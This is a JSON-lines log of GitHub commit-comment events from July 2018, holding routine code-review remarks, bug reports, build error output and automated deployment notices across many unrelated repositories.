{"id":"8022157428","type":"CommitCommentEvent","actor":{"login":"farmaceutics"},"repo":{"name":"dasgarner/xibo-cms"},"payload":{"comment":{"id":29842449,"position":null,"line":null,"path":null,"commit_id":"130bd0c9764d5078fe0e0aeeb1c2e81330574f97","created_at":"2018-07-26T11:39:29Z","updated_at":"2018-07-26T11:39:29Z","author_association":"NONE","body":"Thank you very much, changing the code line, the Xibo CMS installer works correctly, version 1.8.10.\r\n(Manual installation on a Linux web server. PHP version 5.6.)"}},"created_at":"2018-07-26T11:39:29Z"}
{"id":"8022160780","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29842454,"position":null,"line":null,"path":null,"commit_id":"8c3b156a51774383c990c8a1005b4cec9249f78c","created_at":"2018-07-26T11:40:17Z","updated_at":"2018-07-26T11:40:17Z","author_association":"NONE","body":"![tur](https://user-images.githubusercontent.com/41712753/43260316-ab958814-910b-11e8-8dc6-0194bdd2c53a.png)\r\n"}},"created_at":"2018-07-26T11:40:17Z"}
{"id":"8022164348","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29842460,"position":null,"line":null,"path":null,"commit_id":"5c44f205a2466a47443924e2dee6afb16aa980ab","created_at":"2018-07-26T11:41:06Z","updated_at":"2018-07-26T11:41:06Z","author_association":"CONTRIBUTOR","body":"Oups too fast, thanks, fixed at f4cb239fa83"}},"created_at":"2018-07-26T11:41:06Z"}
{"id":"8022165524","type":"CommitCommentEvent","actor":{"login":"kjwelch1"},"repo":{"name":"Falmouth-Games-Academy/cpd-tracker"},"payload":{"comment":{"id":29842465,"position":null,"line":null,"path":null,"commit_id":"a89fddabe2b93010d7aa84f79105eb428f36c6f9","created_at":"2018-07-26T11:41:22Z","updated_at":"2018-07-26T11:41:22Z","author_association":"CONTRIBUTOR","body":"*added by Kieran*\r\ngroup programming"}},"created_at":"2018-07-26T11:41:22Z"}
{"id":"8022170747","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842484,"position":40,"line":132,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:42:29Z","updated_at":"2018-07-26T11:42:29Z","author_association":"MEMBER","body":"Option three"}},"created_at":"2018-07-26T11:42:29Z"}
{"id":"8022171982","type":"CommitCommentEvent","actor":{"login":"despair86"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29842489,"position":null,"line":null,"path":null,"commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T11:42:45Z","updated_at":"2018-07-26T11:42:45Z","author_association":"CONTRIBUTOR","body":"@neuroscr here, try this patch. C++17 `std::[experimental::]filesystem` is now an option that is manually selected. I'll have it merged later once I finish the Windows Server port. 😄 \r\n[cxx17_filesystem_check.patch.txt](https://github.com/majestrate/llarp/files/2231755/cxx17_filesystem_check.patch.txt)\r\n"}},"created_at":"2018-07-26T11:42:45Z"}
{"id":"8022172166","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842491,"position":5,"line":403,"path":"tiledb/rest/json.h","commit_id":"b39b53b4496d012800e1f941f694d105c21718e3","created_at":"2018-07-26T11:42:47Z","updated_at":"2018-07-26T11:42:47Z","author_association":"CONTRIBUTOR","body":"I am not sure why you need to init the domain - this is always done in `ArraySchema` after you set the domain there. I will see what you are doing in the later commits."}},"created_at":"2018-07-26T11:42:47Z"}
{"id":"8022174035","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29842497,"position":null,"line":null,"path":null,"commit_id":"8c3b156a51774383c990c8a1005b4cec9249f78c","created_at":"2018-07-26T11:43:12Z","updated_at":"2018-07-26T11:43:12Z","author_association":"NONE","body":"\r\n![tur](https://user-images.githubusercontent.com/41712753/43260459-1cb41cfe-910c-11e8-8603-7bdbb82ae448.png)\r\n\r\n"}},"created_at":"2018-07-26T11:43:12Z"}
{"id":"8022174810","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842501,"position":41,"line":133,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:43:23Z","updated_at":"2018-07-26T11:43:23Z","author_association":"MEMBER","body":"Is this section needed?"}},"created_at":"2018-07-26T11:43:23Z"}
{"id":"8022178066","type":"CommitCommentEvent","actor":{"login":"vgvassilev"},"repo":{"name":"root-project/rootbench"},"payload":{"comment":{"id":29842510,"position":7,"line":98,"path":"root/io/io/TBufferMergerBenchmarks.cxx","commit_id":"4d6b7f64c606ae63d29c8b5fb76ee6a09e02d286","created_at":"2018-07-26T11:44:07Z","updated_at":"2018-07-26T11:44:07Z","author_association":"MEMBER","body":"Space before the { ;)"}},"created_at":"2018-07-26T11:44:07Z"}
{"id":"8022178973","type":"CommitCommentEvent","actor":{"login":"SoDa-GitHub"},"repo":{"name":"SoDa-GitHub/shadowsocksrr-csharp"},"payload":{"comment":{"id":29842516,"position":null,"line":null,"path":null,"commit_id":"d587866c76a81426d5d27a09511388aa46ff852e","created_at":"2018-07-26T11:44:18Z","updated_at":"2018-07-26T11:44:18Z","author_association":"OWNER","body":"@ufo1024k 下个版本修复。"}},"created_at":"2018-07-26T11:44:18Z"}
{"id":"8022182581","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842533,"position":50,"line":142,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:45:09Z","updated_at":"2018-07-26T11:45:09Z","author_association":"MEMBER","body":"Please remove the debian specific lines 1 and 4."}},"created_at":"2018-07-26T11:45:09Z"}
{"id":"8022185088","type":"CommitCommentEvent","actor":{"login":"web-premier"},"repo":{"name":"sellyourmodel/front"},"payload":{"comment":{"id":29842549,"position":25,"line":467,"path":"src/AppBundle/Controller/CatalogController.php","commit_id":"4fae9901d3f5e22cac2422db235f47b43163c3d3","created_at":"2018-07-26T11:45:39Z","updated_at":"2018-07-26T11:45:39Z","author_association":"COLLABORATOR","body":"Поправил"}},"created_at":"2018-07-26T11:45:39Z"}
{"id":"8022185982","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842551,"position":52,"line":144,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:45:51Z","updated_at":"2018-07-26T11:45:51Z","author_association":"MEMBER","body":"This sentence can be removed."}},"created_at":"2018-07-26T11:45:51Z"}
{"id":"8022187025","type":"CommitCommentEvent","actor":{"login":"ChrisRackauckas"},"repo":{"name":"rveltz/LSODA.jl"},"payload":{"comment":{"id":29842553,"position":null,"line":null,"path":null,"commit_id":"ab9267386dea7870a4452dbd2df1dc522577f3ac","created_at":"2018-07-26T11:46:03Z","updated_at":"2018-07-26T11:46:03Z","author_association":"COLLABORATOR","body":"why is this correct? Printf is a module, not a function. `@printf` is what's used on v0.7."}},"created_at":"2018-07-26T11:46:03Z"}
{"id":"8022189945","type":"CommitCommentEvent","actor":{"login":"Hana33"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":29842561,"position":null,"line":null,"path":null,"commit_id":"493f8a3f514bd8ffd7fb5d9666a952a4446ab177","created_at":"2018-07-26T11:46:41Z","updated_at":"2018-07-26T11:46:41Z","author_association":"NONE","body":"I got the same problem but with Castalia, I didn't quite get the solution proposed . Is it to delete the code line with double type (in red) and replace it with int type (in green)  in the concerned .ned file ?  "}},"created_at":"2018-07-26T11:46:41Z"}
{"id":"8022190187","type":"CommitCommentEvent","actor":{"login":"witsch"},"repo":{"name":"ZeitOnline/zeit.find"},"payload":{"comment":{"id":29842562,"position":null,"line":null,"path":null,"commit_id":"86444986a5630131cbc962cba94ce9fc2f2f5208","created_at":"2018-07-26T11:46:44Z","updated_at":"2018-07-26T11:46:44Z","author_association":"NONE","body":"Naja, okay...  aber dann müssen wir's trotzdem im Test irgendwie anders abbilden... 😄 "}},"created_at":"2018-07-26T11:46:44Z"}
{"id":"8022193440","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842564,"position":140,"line":232,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:47:30Z","updated_at":"2018-07-26T11:47:30Z","author_association":"MEMBER","body":"The backticks around start will not format this. Please remove them."}},"created_at":"2018-07-26T11:47:30Z"}
{"id":"8022197159","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842569,"position":155,"line":247,"path":"docs/manuals/en/developers/generaldevel.md","commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:48:20Z","updated_at":"2018-07-26T11:48:20Z","author_association":"MEMBER","body":"Please replace debian/rules and this by links to GitHub."}},"created_at":"2018-07-26T11:48:20Z"}
{"id":"8022197281","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29842570,"position":51,"line":102,"path":"index.html","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T11:48:22Z","updated_at":"2018-07-26T11:48:22Z","author_association":"NONE","body":"Лівий або правий коменнт краще роби класами а не айдішками, хоч вони в тебе і один раз використовуються. Коли ти будеш такі штуки анімувати через js тобі буде простіше забирати/додавати клас "}},"created_at":"2018-07-26T11:48:22Z"}
{"id":"8022197509","type":"CommitCommentEvent","actor":{"login":"svebert"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":29842571,"position":10,"line":52,"path":"modules/core/src/system.cpp","commit_id":"53fc5440d78fd9ebe727c51243528e1eac3b5e35","created_at":"2018-07-26T11:48:25Z","updated_at":"2018-07-26T11:48:25Z","author_association":"NONE","body":"I have the same problem. The  __initialization_mutex leads to a memory leak. \r\nMy setup is the following: I have a class with static functions which use OpenCV. I use  one of these static functions in a wxWidgets project. When I exit the program, the memory leak occurs. \r\nAny hints how to fix my code, if the above is \"by design\"?"}},"created_at":"2018-07-26T11:48:25Z"}
{"id":"8022198175","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"fsprojects/ProjectScaffold"},"payload":{"comment":{"id":29842572,"position":null,"line":null,"path":null,"commit_id":"4f5e69d210e08692d9fb0ff87d2380aa542f66b4","created_at":"2018-07-26T11:48:34Z","updated_at":"2018-07-26T11:48:34Z","author_association":"NONE","body":"I still get errors off of master on a Mac with a new project scaffold. They look like so:\r\n\r\n>  Restore completed in 644.8 ms for /Users/eric/Projects/TestProjectScaffold/tests/TestingForAuthor.Tests/TestingForAuthor.Tests.fsproj.\r\n/usr/local/share/dotnet/sdk/2.1.301/Microsoft.Common.CurrentVersion.targets(1179,5): error MSB3644: The reference assemblies for framework \".NETFramework,Version=v4.7\" were not found. To resolve this, install the SDK or Targeting Pack for this framework version or retarget your application to a version of the framework for which you have the SDK or Targeting Pack installed. Note that assemblies will be resolved from the Global Assembly Cache (GAC) and will be used in place of reference assemblies. Therefore your assembly may not be correctly targeted for the framework you intend. [/Users/eric/Projects/TestProjectScaffold/tests/TestingForAuthor.Tests/TestingForAuthor.Tests.fsproj]\r\n/usr/local/share/dotnet/sdk/2.1.301/Microsoft.Common.CurrentVersion.targets(1179,5): error MSB3644: The reference assemblies for framework \".NETFramework,Version=v4.5\" were not found. To resolve this, install the SDK or Targeting Pack for this framework version or retarget your application to a version of the framework for which you have the SDK or Targeting Pack installed. Note that assemblies will be resolved from the Global Assembly Cache (GAC) and will be used in place of reference assemblies. Therefore your assembly may not be correctly targeted for the framework you intend. [/Users/eric/Projects/TestProjectScaffold/src/TestingForAuthor/TestingForAuthor.fsproj]\r\n/usr/local/share/dotnet/sdk/2.1.301/Microsoft.Common.CurrentVersion.targets(1179,5): error MSB3644: The reference assemblies for framework \".NETFramework,Version=v4.7\" were not found. To resolve this, install the SDK or Targeting Pack for this framework version or retarget your application to a version of the framework for which you have the SDK or Targeting Pack installed. Note that assemblies will be resolved from the Global Assembly Cache (GAC) and will be used in place of reference assemblies. Therefore your assembly may not be correctly targeted for the framework you intend. [/Users/eric/Projects/TestProjectScaffold/src/TestingForAuthorConsole/TestingForAuthorConsole.fsproj]\r\n/usr/local/share/dotnet/sdk/2.1.301/Microsoft.Common.CurrentVersion.targets(1179,5): error MSB3644: The reference assemblies for framework \".NETFramework,Version=v4.7\" were not found. To resolve this, install the SDK or Targeting Pack for this framework version or retarget your application to a version of the framework for which you have the SDK or Targeting Pack installed. Note that assemblies will be resolved from the Global Assembly Cache (GAC) and will be used in place of reference assemblies. Therefore your assembly may not be correctly targeted for the framework you intend. [/Users/eric/Projects/TestProjectScaffold/src/TestingForAuthor/TestingForAuthor.fsproj]\r\n  TestingForAuthor -> /Users/eric/Projects/TestProjectScaffold/src/TestingForAuthor/bin/Release/netstandard2.0/TestingForAuthor.dll\r\n  TestingForAuthorConsole -> /Users/eric/Projects/TestProjectScaffold/src/TestingForAuthorConsole/bin/Release/netcoreapp2.1/TestingForAuthorConsole.dll\r\n\r\n> Build FAILED.\r\n\r\nI figured I could move this conversation off of twitter."}},"created_at":"2018-07-26T11:48:34Z"}
{"id":"8022200110","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842579,"position":4,"line":179,"path":"tiledb/sm/query/query.cc","commit_id":"f6d057aaed3b6b7dc6c37c684b42e66b868d6e1a","created_at":"2018-07-26T11:48:58Z","updated_at":"2018-07-26T11:48:58Z","author_association":"CONTRIBUTOR","body":"Not sure what this is meant for, but we will discuss more online."}},"created_at":"2018-07-26T11:48:58Z"}
{"id":"8022201716","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842582,"position":14,"line":172,"path":"tiledb/sm/query/query.h","commit_id":"f6d057aaed3b6b7dc6c37c684b42e66b868d6e1a","created_at":"2018-07-26T11:49:19Z","updated_at":"2018-07-26T11:49:19Z","author_association":"CONTRIBUTOR","body":"Make sure to always document the function in the header files."}},"created_at":"2018-07-26T11:49:19Z"}
{"id":"8022202781","type":"CommitCommentEvent","actor":{"login":"Hazama16138"},"repo":{"name":"Hazama16138/study"},"payload":{"comment":{"id":29842584,"position":null,"line":null,"path":null,"commit_id":"1f2e709368bc9640e75e10151bc5125845194e94","created_at":"2018-07-26T11:49:33Z","updated_at":"2018-07-26T11:49:33Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/41429768/43260782-608dbf94-9115-11e8-9314-f07c6c94385c.png)\r\n\r\n\r\n"}},"created_at":"2018-07-26T11:49:33Z"}
{"id":"8022205811","type":"CommitCommentEvent","actor":{"login":"emiliasmolko"},"repo":{"name":"emiliasmolko/boardGames"},"payload":{"comment":{"id":29842593,"position":null,"line":null,"path":null,"commit_id":"e1701f3a443879f46b13bc93163fe1cb3235da7b","created_at":"2018-07-26T11:50:12Z","updated_at":"2018-07-26T11:50:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/95818ac2-c557-427c-88fd-7aa2d98bb0e9?env_id=ibm%3Ayp%3Aus-south \"boardGames\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1dfeec01-3e68-4e47-8825-d2d2cf72360a?env_id=ibm%3Ayp%3Aus-south \"boardGames\") deployed [boardGames](https://github.com/emiliasmolko/boardGames/releases/tag/deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-115011 \"deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-115011\") to [wecare](https://console.bluemix.net/apps/3c373e0f-b188-441b-8d79-d7e5f2ae5afd?env_id=ibm:yp:us-south \"ibm:yp:us-south:emiliasmolko:wecare\"), including this commit"}},"created_at":"2018-07-26T11:50:12Z"}
{"id":"8022208069","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29842597,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-26T11:50:41Z","updated_at":"2018-07-26T11:50:41Z","author_association":"NONE","body":"Hey Max. You are on my Christmas card list. Works a treat. I shall be using it in anger in a week or so for a client, so I'll let you know how I do.\r\n\r\nThe challenge for you, as I see it, it enabling things that Sketch doesn't. Things like overlays or hover effects.\r\n\r\nI guess transitions could be included, but you'd need to capture that for every link.\r\n\r\nYour kung fu is strong. CIn cin.\r\n"}},"created_at":"2018-07-26T11:50:41Z"}
{"id":"8022208163","type":"CommitCommentEvent","actor":{"login":"Gidiklf"},"repo":{"name":"Gidiklf/CPApp"},"payload":{"comment":{"id":29842598,"position":null,"line":null,"path":null,"commit_id":"145d5f52c045f1708fcb7a8b841175d6a389b25d","created_at":"2018-07-26T11:50:42Z","updated_at":"2018-07-26T11:50:42Z","author_association":"OWNER","body":"Fix the conflit"}},"created_at":"2018-07-26T11:50:42Z"}
{"id":"8022209114","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"sdhz152/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":29842600,"position":null,"line":null,"path":null,"commit_id":"b8f5315b42d9208dc9ee61f32e6cd9cec7f4bbee","created_at":"2018-07-26T11:50:55Z","updated_at":"2018-07-26T11:50:55Z","author_association":"NONE","body":"？？？？？你逗我。。。。这是给18:9屏幕用的"}},"created_at":"2018-07-26T11:50:55Z"}
{"id":"8022209431","type":"CommitCommentEvent","actor":{"login":"joergsteffens"},"repo":{"name":"bareos/bareos"},"payload":{"comment":{"id":29842603,"position":null,"line":null,"path":null,"commit_id":"40c0e4e179127efcc371c21ebb7de5401b04e588","created_at":"2018-07-26T11:50:59Z","updated_at":"2018-07-26T11:50:59Z","author_association":"MEMBER","body":"Please prepend your commit message by \"doc: \".\r\nPlease add your name to the authors file. If there is more than authors file, you might also merge them into one. Ask Philipp about this."}},"created_at":"2018-07-26T11:50:59Z"}
{"id":"8022211078","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29842608,"position":28,"line":43,"path":"odoo/addons/base/data/res_users_demo.xml","commit_id":"58fc4e440952bde533c8aa1dc8b6fc2440a05337","created_at":"2018-07-26T11:51:21Z","updated_at":"2018-07-26T11:51:21Z","author_association":"CONTRIBUTOR","body":"Mitchell Stephens and Marc Brown? Seriously?"}},"created_at":"2018-07-26T11:51:21Z"}
{"id":"8022212479","type":"CommitCommentEvent","actor":{"login":"honzajavorek"},"repo":{"name":"apiaryio/dredd"},"payload":{"comment":{"id":29842612,"position":46,"line":46,"path":"docs/usage-cli.md","commit_id":"7bffde7be6fcaf7c96cf114751dc5fde02b86ac4","created_at":"2018-07-26T11:51:39Z","updated_at":"2018-07-26T11:51:39Z","author_association":"MEMBER","body":"Then there is currently no way to get such data to the non-JS hooks' code. You could save that data to a separate data file and use the data in Dredd arguments using a Bash wrapper script. Then you could load the source file in non-JS hooks as well."}},"created_at":"2018-07-26T11:51:39Z"}
{"id":"8022212517","type":"CommitCommentEvent","actor":{"login":"wc-duck"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29842613,"position":null,"line":null,"path":null,"commit_id":"c192a6d1900b7cdcbf521b524548db11c4c25818","created_at":"2018-07-26T11:51:40Z","updated_at":"2018-07-26T11:51:40Z","author_association":"CONTRIBUTOR","body":"Would it be possible to have a function working as AddJob previously did?"}},"created_at":"2018-07-26T11:51:40Z"}
{"id":"8022212869","type":"CommitCommentEvent","actor":{"login":"mvcweb75"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842615,"position":10,"line":10,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"38725f2b8c2883ad3741d675db9f375d2d91aaf4","created_at":"2018-07-26T11:51:44Z","updated_at":"2018-07-26T11:51:44Z","author_association":"OWNER","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:51:44Z"}
{"id":"8022214461","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29842617,"position":22,"line":142,"path":"main.css","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T11:52:07Z","updated_at":"2018-07-26T11:52:07Z","author_association":"NONE","body":"блоки центруй через justify. Почитай за центрування flex блоків"}},"created_at":"2018-07-26T11:52:07Z"}
{"id":"8022217013","type":"CommitCommentEvent","actor":{"login":"blazeu"},"repo":{"name":"coala/gh-board"},"payload":{"comment":{"id":29842621,"position":4,"line":51,"path":"package.json","commit_id":"4536fe316ea35e65de6a78a2fc57d3ab344bf592","created_at":"2018-07-26T11:52:40Z","updated_at":"2018-07-26T11:52:40Z","author_association":"MEMBER","body":"Why is this in package.json if we're going to install it via `npm install` in Travis anyway?\r\n\r\nThe proper way to specify version is still in `engines` key, whether that works in Travis or not. https://docs.npmjs.com/files/package.json#engines"}},"created_at":"2018-07-26T11:52:40Z"}
{"id":"8022217398","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29842623,"position":null,"line":null,"path":null,"commit_id":"b7426385ee00be3c402f87d8f93adb7311f26f78","created_at":"2018-07-26T11:52:45Z","updated_at":"2018-07-26T11:52:45Z","author_association":"NONE","body":"maybe put dwarf.baw in media to not duplicate it around the entire repository\r\n"}},"created_at":"2018-07-26T11:52:45Z"}
{"id":"8022218422","type":"CommitCommentEvent","actor":{"login":"mvcweb75"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842628,"position":14,"line":14,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"38725f2b8c2883ad3741d675db9f375d2d91aaf4","created_at":"2018-07-26T11:52:58Z","updated_at":"2018-07-26T11:52:58Z","author_association":"OWNER","body":"들여쓰기를 수정해 주세요"}},"created_at":"2018-07-26T11:52:58Z"}
{"id":"8022218911","type":"CommitCommentEvent","actor":{"login":"mightyCelu"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":29842629,"position":null,"line":null,"path":null,"commit_id":"493f8a3f514bd8ffd7fb5d9666a952a4446ab177","created_at":"2018-07-26T11:53:04Z","updated_at":"2018-07-26T11:53:04Z","author_association":"NONE","body":"I'm not sure what you're asking. From a quick glance at Castlia's code, the header length is already using `int` instead of `double`."}},"created_at":"2018-07-26T11:53:04Z"}
{"id":"8022221139","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29842634,"position":46,"line":172,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"5a516d95a51b3b686f5950d58cbfcbc118d982ba","created_at":"2018-07-26T11:53:32Z","updated_at":"2018-07-26T11:53:32Z","author_association":"NONE","body":"should be updated to MRU (- eth header len)"}},"created_at":"2018-07-26T11:53:32Z"}
{"id":"8022222345","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842636,"position":10,"line":10,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"38725f2b8c2883ad3741d675db9f375d2d91aaf4","created_at":"2018-07-26T11:53:48Z","updated_at":"2018-07-26T11:53:48Z","author_association":"COLLABORATOR","body":"아, 정말 들여쓰기가 잘못 됐네요."}},"created_at":"2018-07-26T11:53:48Z"}
{"id":"8022222955","type":"CommitCommentEvent","actor":{"login":"mrwebc"},"repo":{"name":"mvcweb75/community"},"payload":{"comment":{"id":29842639,"position":14,"line":14,"path":"프로젝트 사전작업과 주의사항.txt","commit_id":"38725f2b8c2883ad3741d675db9f375d2d91aaf4","created_at":"2018-07-26T11:53:55Z","updated_at":"2018-07-26T11:53:55Z","author_association":"COLLABORATOR","body":"수정해서 다시 업로드 하겠습니다."}},"created_at":"2018-07-26T11:53:55Z"}
{"id":"8022223830","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29842640,"position":98,"line":130,"path":"source/Irrlicht/CSTLMeshWriter.cpp","commit_id":"657158bc7fee9fa85f7738fb68e87daa00f6763f","created_at":"2018-07-26T11:54:07Z","updated_at":"2018-07-26T11:54:07Z","author_association":"NONE","body":"IrrlichtBAW"}},"created_at":"2018-07-26T11:54:07Z"}
{"id":"8022224521","type":"CommitCommentEvent","actor":{"login":"enetsec"},"repo":{"name":"dgiardini/rtl-ais"},"payload":{"comment":{"id":29842641,"position":null,"line":null,"path":null,"commit_id":"b93f9f3cc1b9884afc940a4e1a6e6339eb4a166f","created_at":"2018-07-26T11:54:16Z","updated_at":"2018-07-26T11:54:16Z","author_association":"NONE","body":"Hi klapligehesten, I tried to use the -t command but the application does not accept even being documented in help."}},"created_at":"2018-07-26T11:54:16Z"}
{"id":"8022226189","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842646,"position":61,"line":231,"path":"tiledb/sm/query/query.cc","commit_id":"550e51cdf2af76cf00c49f488a0d900164b01472","created_at":"2018-07-26T11:54:38Z","updated_at":"2018-07-26T11:54:38Z","author_association":"CONTRIBUTOR","body":"I think the function name is a bit misleading. I was expecting a json string as input here."}},"created_at":"2018-07-26T11:54:38Z"}
{"id":"8022226389","type":"CommitCommentEvent","actor":{"login":"oshadura"},"repo":{"name":"root-project/rootbench"},"payload":{"comment":{"id":29842647,"position":7,"line":98,"path":"root/io/io/TBufferMergerBenchmarks.cxx","commit_id":"4d6b7f64c606ae63d29c8b5fb76ee6a09e02d286","created_at":"2018-07-26T11:54:41Z","updated_at":"2018-07-26T11:54:41Z","author_association":"MEMBER","body":"thnx!"}},"created_at":"2018-07-26T11:54:41Z"}
{"id":"8022226763","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29842649,"position":null,"line":null,"path":null,"commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-26T11:54:46Z","updated_at":"2018-07-26T11:54:46Z","author_association":"CONTRIBUTOR","body":"> Absence of quality control demonstrated even by Alpine core developers and absolutely no progress on this.\r\n\r\nThis is a discussion we should take somewhere else. Not here.\r\n\r\nPlease note that our [code of conduct](https://alpinelinux.org/community/code-of-conduct.html) say that we should be _Be respectful, tolerant and forgiving towards others._  We have tried to be respectful and tolerated your toxic behavior and forgiven your outrages more times than you deserve. Please treat the other team members the same way."}},"created_at":"2018-07-26T11:54:46Z"}
{"id":"8022227259","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842651,"position":8,"line":8,"path":"test/plots.jl","commit_id":"fac927daf05ce34aff8edfe06ad7f6c747e14366","created_at":"2018-07-26T11:54:53Z","updated_at":"2018-07-26T11:54:53Z","author_association":"NONE","body":"@xuedong maybe you could do that without having hard-coded path for your system? Not sure how to do it in Julia but this \"hack\" should be avoided."}},"created_at":"2018-07-26T11:54:53Z"}
{"id":"8022229508","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29842656,"position":null,"line":null,"path":null,"commit_id":"657158bc7fee9fa85f7738fb68e87daa00f6763f","created_at":"2018-07-26T11:55:24Z","updated_at":"2018-07-26T11:55:24Z","author_association":"NONE","body":"tested it yet?"}},"created_at":"2018-07-26T11:55:24Z"}
{"id":"8022230375","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29842658,"position":null,"line":null,"path":null,"commit_id":"35c38f1b167f72ad675b53e5ebcd64aafe566a49","created_at":"2018-07-26T11:55:36Z","updated_at":"2018-07-26T11:55:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-412](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-412).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-412-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T11:55:36Z"}
{"id":"8022230668","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29842659,"position":57,"line":319,"path":"main.css","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T11:55:39Z","updated_at":"2018-07-26T11:55:39Z","author_association":"NONE","body":"display: inline лишній, він постійно буде перетиратися"}},"created_at":"2018-07-26T11:55:39Z"}
